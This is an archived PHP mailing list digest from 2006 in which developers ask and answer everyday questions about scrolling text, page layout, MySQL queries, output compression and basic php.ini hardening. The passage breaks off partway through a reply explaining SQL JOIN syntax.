Hi, I would like to have a scrolling text (as banner) on our website. I tried Marquee which work very well but since i use a table and allocate 100% to marquee, if the content of a row (tr content) is greater than 100% or the table width, internet explorer automatically write the message on several lines (not several tr). e.g : sentence to display : this is a very long sentence about the way how works internet explorer with marquee way how is it displays under IE : this is a very long sentence about the way how works internet explorer with marquee under opera and firefow, it's well displayed as this is a very long sentence about the way how works internet explorer with marquee so, i would like to know if there is another way how to do a scrolling text without using flash, shockwave or other tool...only in php or HTML (in worse case). thanks a lot, -- Alain Windows XP SP2 PostgreSQL 8.1.4 Apache 2.0.58 PHP 5
Re: [PHP] Scrolling text
On Mon, 2006-11-13 at 20:22 +0100, Alain Roger wrote: Hi, I would like to have a scrolling text (as banner) on our website. I tried Marquee which work very well but since i use a table and allocate 100% to marquee, if the content of a row (tr content) is greater than 100% or the table width, internet explorer automatically write the message on several lines (not several tr). e.g : sentence to display : this is a very long sentence about the way how works internet explorer with marquee way how is it displays under IE : this is a very long sentence about the way how works internet explorer with marquee under opera and firefow, it's well displayed as this is a very long sentence about the way how works internet explorer with marquee so, i would like to know if there is another way how to do a scrolling text without using flash, shockwave or other tool...only in php or HTML (in worse case). thanks a lot, This works really well without the annoyance: div style=overflow: scroll; white-space: nowrap; this is a very long sentence about the way how works internet explorer with marquee /div Cheers, Rob. -- .. | InterJinn Application Framework - http://www.interjinn.com | :: | An application and templating framework for PHP. Boasting | | a powerful, scalable system for accessing system services | | such as forms, properties, sessions, and caches. InterJinn | | also provides an extremely flexible architecture for | | creating re-usable components quickly and easily. | `' -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] one click - two actions?
I really don't know? My site is all php and ready to go live except for this little problem. I would really appreciate some help. On Nov 13, 2006, at 4:12 AM, John Meyer wrote: Not to be rude or anything, but if you want to do two things with one click, wouldn't the javascript list be the place you would want to go?
[PHP] Problem with PHP 5.2.0
Hi. I just installed PHP 5.2.0 and I'm running into some strange problems. I have a rather large program which uses sockets, pcntl, posix, pdo (mysql), and is fully object oriented. The program is rather large and is about 75,000 lines of code. When I run the application with PHP 5.1.6, I can execute commands in around 0.6 to 0.8 seconds, uses less then 1% cpu power, and takes around 14 megs of ram. I installed PHP 5.2.0 and when I execute a command (through my application), it takes 9 to 12 seconds to complete, it uses 100% cpu power, and eats about 180 megs of ram. Nothing changed other then installing PHP 5.2.0. I have reinstalled 5.1.6 and everything is back to normal. I have compiled both versions the exact same way with the same command line options. Are there any outstanding issues with PHP 5.2.0? Anyone have any similar problems? I don't want to go through my source code to find where 5.2.0 is hanging so I'm hoping there is a known issue already documented out there. Here is config line: ./configure --prefix=/usr/local/php5 --libdir=/usr/local/php --with-config-file-path=/usr/local/php --with-zlib --with-mcrypt --enable-cli --without-pear --enable-libgcc --with-curl --enable-sockets --enable-pcntl --enable-posix --enable-sigchild --disable-cgi --with-pdo-mysql --with-imap-ssl=/usr/local/imap-2006c1 --with-openssl --enable-ftp Any help would be appreciated. Thanks, John W. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] one click - two actions?
Mel, that may have been a disguised hint. Your answer lies in javascript. The first php page needs to contain javascript to open a second page with the URL to the second php script when the first page loads. Keep a couple of things in mind, popup blockers will reek havoc if you can't get visitors to your site to stop blocking popups and if you expect both URLs to receive form contents, you will have to make arrangements for that in the javascript in your first page, since it will need to pass the data again. Check out http://www.hotscripts.com for some links to sites with the necessary javascript. Hope this helps, Warren Vail -Original Message- From: Mel [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 12:32 PM To: John Meyer Cc: PHP General List Subject: Re: [PHP] one click - two actions? I really don't know? My site is all php and ready to go live except for this little problem. I would really appreciate some help. On Nov 13, 2006, at 4:12 AM, John Meyer wrote: Not to be rude or anything, but if you want to do two things with one click, wouldn't the javascript list be the place you would want to go? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Mysql strategy
Dotan Cohen wrote: If I have to perform 30 LIKE searches for different keywords in a varchar field, which strategy would be recommended: 1) 30 searches, one for each keyword 2) To select the varchar field from all the rows, and search through them with php's array functions? It's not going to make a great deal of difference if you do the processing in the MySQL or the PHP, in this case it's basically the same operation in each. I suspect that efficiently recreating the LIKE functionality in PHP wouldn't be trivial to do, if you are just doing straight comparisons the MySQL STRCMP function should be faster. If you are worried about the speed of this query I'd suggest rethinking your database structure. Text field comparisons will always be relatively slow compared to numeric comparisons or numeric lookups. My reading of this query however is that it should be 30 OR comparisons, no joins involved. In this case the query will scale linearly with your database size so you shouldn't worry too much about it slowing down over time. David -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] one click - two actions?
Thank you for your reply. I think my question is really much more simple than what you are suggesting. If you have a quick look at http://www.squareinch.net/single_page.php?art=crp_logo.jpg you will see what I mean. I have a single page and both results load in the same page. When I click on a link the picture loads on the left side and the info should load on the right side. Right now the info is visible at all times regardless of what I click on! I need to know how to join my echo statements and/or my query! On Nov 13, 2006, at 12:57 PM, Warren Vail wrote: Mel, that may have been a disguised hint. Your answer lies in javascript. The first php page needs to contain javascript to open a second page with the URL to the second php script when the first page loads. Keep a couple of things in mind, popup blockers will reek havoc if you can't get visitors to your site to stop blocking popups and if you expect both URLs to receive form contents, you will have to make arrangements for that in the javascript in your first page, since it will need to pass the data again. Check out http://www.hotscripts.com for some links to sites with the necessary javascript. Hope this helps, Warren Vail -Original Message- From: Mel [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 12:32 PM To: John Meyer Cc: PHP General List Subject: Re: [PHP] one click - two actions? I really don't know? My site is all php and ready to go live except for this little problem. I would really appreciate some help. On Nov 13, 2006, at 4:12 AM, John Meyer wrote: Not to be rude or anything, but if you want to do two things with one click, wouldn't the javascript list be the place you would want to go? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Mysql strategy
On Tue, 2006-11-14 at 00:51 +1100, David Tulloh wrote: Dotan Cohen wrote: If I have to perform 30 LIKE searches for different keywords in a varchar field, which strategy would be recommended: 1) 30 searches, one for each keyword 2) To select the varchar field from all the rows, and search through them with php's array functions? It's not going to make a great deal of difference if you do the processing in the MySQL or the PHP, in this case it's basically the same operation in each. I suspect that efficiently recreating the LIKE functionality in PHP wouldn't be trivial to do, if you are just doing straight comparisons the MySQL STRCMP function should be faster. If you are worried about the speed of this query I'd suggest rethinking your database structure. Text field comparisons will always be relatively slow compared to numeric comparisons or numeric lookups. My reading of this query however is that it should be 30 OR comparisons, no Except that most search engines refine the search when you add more keywords in contrast to your suggestion of expanding the search :) Cheers, Rob. -- .. | InterJinn Application Framework - http://www.interjinn.com | :: | An application and templating framework for PHP. Boasting | | a powerful, scalable system for accessing system services | | such as forms, properties, sessions, and caches. InterJinn | | also provides an extremely flexible architecture for | | creating re-usable components quickly and easily. | `' -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Compressing both php and linked css files with ob_gzhandler and htaccess
Can I compress a php file AND its referenced css files at the same time ? Currently, I am using ob_gzhandler to compress my php files only . Works great:) As I have found that you CAN NOT use ob_gz and zlib at the same time, how do I amend the htaccess file to use ob_gz, These files are in my CSS folder along with style.css. . .htaccess AddHandler application/x-httpd-php .css php_value auto_prepend_file gzip-css.php php_flag zlib.output_compression On gzip-css.php ?php ob_start (ob_gzhandler); header(Content-type: text/css; charset: UTF-8); header(Cache-Control: must-revalidate); $offset = 60 * 60 ; $ExpStr = Expires: . gmdate(D, d M Y H:i:s, time() + $offset) . GMT; header($ExpStr); ? many thanks as I am learning the ins and outs of htaccess and ob_gzhandler -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Compressing both php and linked css files with ob_gzhandler and htaccess
Graham Anderson wrote: Can I compress a php file AND its referenced css files at the same time ? Currently, I am using ob_gzhandler to compress my php files only . Works great:) As I have found that you CAN NOT use ob_gz and zlib at the same time, how do I amend the htaccess file to use ob_gz, er ... These files are in my CSS folder along with style.css. . .htaccess AddHandler application/x-httpd-php .css php_value auto_prepend_file gzip-css.php php_flag zlib.output_compression On php_flag zlib.output_compression Off no? gzip-css.php ?php ob_start (ob_gzhandler); header(Content-type: text/css; charset: UTF-8); header(Cache-Control: must-revalidate); $offset = 60 * 60 ; $ExpStr = Expires: . gmdate(D, d M Y H:i:s, time() + $offset) . GMT; header($ExpStr); ? many thanks as I am learning the ins and outs of htaccess and ob_gzhandler --PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Compressing both php and linked css files with ob_gzhandler and htaccess
yes :) I DID try that strangely, turning it off disables/kills the css file g On Nov 13, 2006, at 2:08 PM, Jochem Maas wrote: Graham Anderson wrote: Can I compress a php file AND its referenced css files at the same time ? Currently, I am using ob_gzhandler to compress my php files only . Works great:) As I have found that you CAN NOT use ob_gz and zlib at the same time, how do I amend the htaccess file to use ob_gz, er ... These files are in my CSS folder along with style.css. . .htaccess AddHandler application/x-httpd-php .css php_value auto_prepend_file gzip-css.php php_flag zlib.output_compression On php_flag zlib.output_compression Off no? gzip-css.php ?php ob_start (ob_gzhandler); header(Content-type: text/css; charset: UTF-8); header(Cache-Control: must-revalidate); $offset = 60 * 60 ; $ExpStr = Expires: . gmdate(D, d M Y H:i:s, time() + $offset) . GMT; header($ExpStr); ? many thanks as I am learning the ins and outs of htaccess and ob_gzhandler --PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Compressing both php and linked css files with ob_gzhandler and htaccess
Unfortunately, I am on a shared server for this project :( Is there some way to enable mod_deflate without admin server privs? many thanks On Nov 13, 2006, at 1:59 PM, steve wrote: Why use php to compress at all? Use mod_deflate. On 11/13/06, Graham Anderson [EMAIL PROTECTED] wrote: Can I compress a php file AND its referenced css files at the same time ? Currently, I am using ob_gzhandler to compress my php files only . Works great:) As I have found that you CAN NOT use ob_gz and zlib at the same time, how do I amend the htaccess file to use ob_gz, These files are in my CSS folder along with style.css. . .htaccess AddHandler application/x-httpd-php .css php_value auto_prepend_file gzip-css.php php_flag zlib.output_compression On gzip-css.php ?php ob_start (ob_gzhandler); header(Content-type: text/css; charset: UTF-8); header(Cache-Control: must-revalidate); $offset = 60 * 60 ; $ExpStr = Expires: . gmdate(D, d M Y H:i:s, time() + $offset) . GMT; header($ExpStr); ? many thanks as I am learning the ins and outs of htaccess and ob_gzhandler -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] one click - two actions?
Mel, Not sure if I understand your question now or not, but here goes. In order to prepare your page you want to be able to click a link on the left and have the page on the right replaced with something in response. Technically when php prepares the page, it prepares both sides (unless you are using frames). If preparing each side requires different queries against your database, you can certainly do two database queries in the same execution. When you first posed your question you talked about starting two pages at once. What I see is one page. Perhaps if you used frames you could cause the left frame to be a separate PHP script and the one on the right another, this would allow your server to process both requests simultaneously, perhaps this is what you meant? Technically they are still part of the one page, but each would be a separate frame within the page. Caution about using technical terms, in your first message you referred to separate pages when (I believe) you may have been referring to one page (yes, page is a technical term) and in your second message you used a term Join which has a meaning when running queries on your database, causing me to think for a moment that your question had been about retrieving information from your database, which you seemed to mention. If you opt to use frames and are new to PHP programming, or programming with frames, expect difficulties (use of Target consistently is the key). I avoid frames unless I simply can't do what I want to do without the use of them. I think at one time some browsers didn't support frames, not sure any more. Warren Vail -Original Message- From: Mel [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 1:32 PM To: Warren Vail Cc: 'John Meyer'; 'PHP General List' Subject: Re: [PHP] one click - two actions? Thank you for your reply. I think my question is really much more simple than what you are suggesting. If you have a quick look at http://www.squareinch.net/single_page.php?art=crp_logo.jpg you will see what I mean. I have a single page and both results load in the same page. When I click on a link the picture loads on the left side and the info should load on the right side. Right now the info is visible at all times regardless of what I click on! I need to know how to join my echo statements and/or my query! On Nov 13, 2006, at 12:57 PM, Warren Vail wrote: Mel, that may have been a disguised hint. Your answer lies in javascript. The first php page needs to contain javascript to open a second page with the URL to the second php script when the first page loads. Keep a couple of things in mind, popup blockers will reek havoc if you can't get visitors to your site to stop blocking popups and if you expect both URLs to receive form contents, you will have to make arrangements for that in the javascript in your first page, since it will need to pass the data again. Check out http://www.hotscripts.com for some links to sites with the necessary javascript. Hope this helps, Warren Vail -Original Message- From: Mel [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 12:32 PM To: John Meyer Cc: PHP General List Subject: Re: [PHP] one click - two actions? I really don't know? My site is all php and ready to go live except for this little problem. I would really appreciate some help. On Nov 13, 2006, at 4:12 AM, John Meyer wrote: Not to be rude or anything, but if you want to do two things with one click, wouldn't the javascript list be the place you would want to go? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Mysql strategy
David Tulloh wrote: Dotan Cohen wrote: If I have to perform 30 LIKE searches for different keywords in a varchar field, which strategy would be recommended: 1) 30 searches, one for each keyword 2) To select the varchar field from all the rows, and search through them with php's array functions? It's not going to make a great deal of difference if you do the processing in the MySQL or the PHP, in this case it's basically the same operation in each. I suspect that efficiently recreating the LIKE functionality in PHP wouldn't be trivial to do, if you are just doing straight comparisons the MySQL STRCMP function should be faster. I'd say there will be a big difference. Pulling in 10,000 entries from the database and then sorting them in php will take a lot of memory (and database time to retrieve all of the entries). Getting the database to restrict that number of entries will take a little time but it doesn't have to return all entries, your php memory won't blow out and it won't have bugs in it. -- Postgresql php tutorials http://www.designmagick.com/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Mysql strategy
On Monday 13 November 2006 17:51, Chris wrote: It's not going to make a great deal of difference if you do the processing in the MySQL or the PHP, in this case it's basically the same operation in each. I suspect that efficiently recreating the LIKE functionality in PHP wouldn't be trivial to do, if you are just doing straight comparisons the MySQL STRCMP function should be faster. I'd say there will be a big difference. Pulling in 10,000 entries from the database and then sorting them in php will take a lot of memory (and database time to retrieve all of the entries). Getting the database to restrict that number of entries will take a little time but it doesn't have to return all entries, your php memory won't blow out and it won't have bugs in it. As a general rule, I try to push as much logic into the query as I can for the simple reason that MySQL is optimized C and my PHP code gets interpreted. The odds of me writing something in PHP that's faster than MySQL AB's C code are slim. :-) The exception is grouping, which I've often had to do in PHP with a loop to rebuild a result array. The performance hit for that is not that big, however, and if you free() the result set afterward then the memory usage is not a major issue either. If you're finding your query is slow, look into your indexes. Just today I cut a single query from 230 seconds to 21 seconds just by adding two indexes. :-) -- Larry Garfield AIM: LOLG42 [EMAIL PROTECTED] ICQ: 6817012 If nature has made any one thing less susceptible than all others of exclusive property, it is the action of the thinking power called an idea, which an individual may exclusively possess as long as he keeps it to himself; but the moment it is divulged, it forces itself into the possession of every one, and the receiver cannot dispossess himself of it. -- Thomas Jefferson -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Problem with PHP 5.2.0
This one time, at band camp, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Hi. I just installed PHP 5.2.0 and I'm running into some strange problems. xdebug Kevin -- Democracy is two wolves and a lamb voting on what to have for lunch. Liberty is a well-armed lamb contesting the vote. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] server side security
H. Dan Phillips wrote: Let me begin by saying I'm a newbie to PHP and open source. I setup a windows 2003 server with IIS6, PHP 5x and MYSQL5x for one of our developers to start building a new web based application. The developer will be using PHP myadmin for his purposes. The settings that were used were ones posted out on many web sites for this combo. I'm looking for detailed instructions to secure the server from the standpoint of the server OS, php.ini and mysql. The developer will be securing access to the application from his end but I want to make sure that the server also remain secure. It will only be used within our intra-net and only by a handful of people. Any and all suggestions will be greatly appreciated. We can't offer advice on the OS or mysql - find a more specific mailing list for those questions. For the php.ini, disable allow_url_fopen (or if you're using php 5.2.0, disable allow_url_include at least) and disable register_globals. Depending on what the application does, I'd look at disabling exec, system and the like (see http://php.net/exec look for disable_functions in the php.ini file). Turn off enable_dl unless you have a specific need for it. Only enable the extensions you need to use (ie don't enable oracle support if you aren't going to use it). Having said that - most of the php security problems relate to the application, rather than the php.ini file. -- Postgresql php tutorials http://www.designmagick.com/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] server side security
assuming this is possible - not a sys admin - so can be way out of my league Have you thought not having it available on the open web? Put it behind a firewall and make it so only local ips on the LAN can access it with strong passwords. MySQL - make sure you change the default root user password to something hard - and create only users with the minimum permissions needed that can only access say from the localhost. /assumption -Original Message- From: H. Dan Phillips [mailto:[EMAIL PROTECTED] Sent: Tuesday, November 14, 2006 1:44 AM To: php-general@lists.php.net Subject: [PHP] server side security Let me begin by saying I'm a newbie to PHP and open source. I setup a windows 2003 server with IIS6, PHP 5x and MYSQL5x for one of our developers to start building a new web based application. The developer will be using PHP myadmin for his purposes. The settings that were used were ones posted out on many web sites for this combo. I'm looking for detailed instructions to secure the server from the standpoint of the server OS, php.ini and mysql. The developer will be securing access to the application from his end but I want to make sure that the server also remain secure. It will only be used within our intra-net and only by a handful of people. Any and all suggestions will be greatly appreciated. Thks Dan Phillips -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] problem with php[4,5] (horde 2/3)
Norbert Ehart wrote: hello, i have some problem with horde, after my isp have upgraded php on my vps! i only get some error massages. Notice: Only variable references should be returned by reference in /usr/share/horde3/lib/Horde/Perms.php on line 343 Notice: Only variable references should be returned by reference in /usr/share/horde3/lib/Horde/Auth.php on line 1193 Warning: Cannot modify header information - headers already sent by (output started at /usr/share/horde3/lib/Horde/Perms.php:343) in /usr/share/horde3/index.php on line 51 Talk to the horde mailing list / forum. They need to fix this properly. -- Postgresql php tutorials http://www.designmagick.com/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] one click - two actions?
At 11/13/2006 01:28 AM, Mel wrote: Could someone please help me figure out how to show some description (where applicable) at the same time as I show an image, when I click on a link, without repeating the entire query? The image and the description are both in the same table in my database. I now show the image when I click on the link which is good, but the description stays on at all times instead of appearing only when active. http://www.squareinch.net/single_page.php Mel, I think what you're looking for is JOIN syntax for your queries: http://dev.mysql.com/doc/refman/4.1/en/join.html For example: SELECT * FROM client, job WHERE client.companyId=job.companyId AND (client.status='active' or client.status='old') order by client.companyName; (Note that when you extract fields from more than one table like this, you identify the table that each field belongs to, e.g. client.companyId.) Then you can extract the desired fields from both tables in the same loop because they've been captured together. Your current logic executes a job query for every row of client, which is extremely inefficient. The dataset produced by the join query is going to look something like this: client. job. companyId companyId 1 2 1 3 1 9 2 4 2 5 ... In other words, there will be one row for each job record, with the (parent) client fields duplicated each row. You can further improve the efficiency of your query by naming only the fields you need, instead of using * to extract all fields: SELECT client.companyName, job.pix, job.jobType, job.url, job.web FROM client, job WHERE client.companyId=job.companyId AND (client.status='active' or client.status='old') order by client.companyName; Once you execute the join query, your PHP loop can cycle in a similar way, echoing a company name and then listing all the job types until a new company name occurs, etc. You've got other problems, however. If you look at your HTML source, you'll see markup like this: span class='navCompany'Builtworks/spanspan class='navArrow' /span span class='navText'a href='single_page.php?art=btw_logo.jpg'logo/a/span span class='navText'a href='single_page.php?art='/a/span span class='navText'a href='single_page.php?art='/a/span span class='navText'a href='single_page.php?art='/a/span span class='navText'a href='single_page.php?art='/a/span brspan class='navCompany'Citizens Bank / eProperty/spanspan class='navArrow' /span span class='navText'a href='single_page.php?art=ctz_web1.jpg'website/a/span All those empty hyperlinks aren't doing anything but making your download heavier than it has to be. I think you need to test your 'jobType' fields and output only those that aren't blank. Finally, to answer one of your questions, your logic to display the description area has a snarl of syntax flaws: /* query 2 from job */ ... foreach($row as $url) { $row = mysql_fetch_array($result2,MYSQL_ASSOC); if (url={$row['url']}) echo span class='navText'a href='{$row['url']}'{$row['web']}/ a/span; } You're testing if (url={$row['url']}) 1) Because you've put that expression in quotes, you're testing the true/false value of a string expression which will always test true unless it's blank, which this one will never be. Expressing it as a string might be correct if you were using eval(), but you're not and you're safer not to. Eval() can get you into big trouble if there are PHP code fragments in your database fields; until you get better control of your logic I urge you not to use it. 2) You omitted the $ in front of $url. 3) You used a single equal sign instead of two. This: if ($url = $row['url']) tests whether $row['url'] is blank, and also sets $url equal to that value. I think you meant this: if ($url == $row['url']) which tests whether the variable $url is equal to the database field $row['url']. Good luck, Paul This is the code I have for the image area: /* query 1 from client */ $query = SELECT * FROM client where status='active' or status='old' order by companyName; $result = mysql_query($query) or die (Couldn't execute query); while ($aaa = mysql_fetch_array($result,MYSQL_ASSOC)) { echo span class='navCompany'{$aaa['companyName']}/spanspan class='navArrow' /span\n; /* query 2 from job */ $query = SELECT * FROM job WHERE companyId='{$aaa['companyId']}'; $result2 = mysql_query($query) or die (Couldn't execute query2); foreach($aaa as $jobType) { $bbb =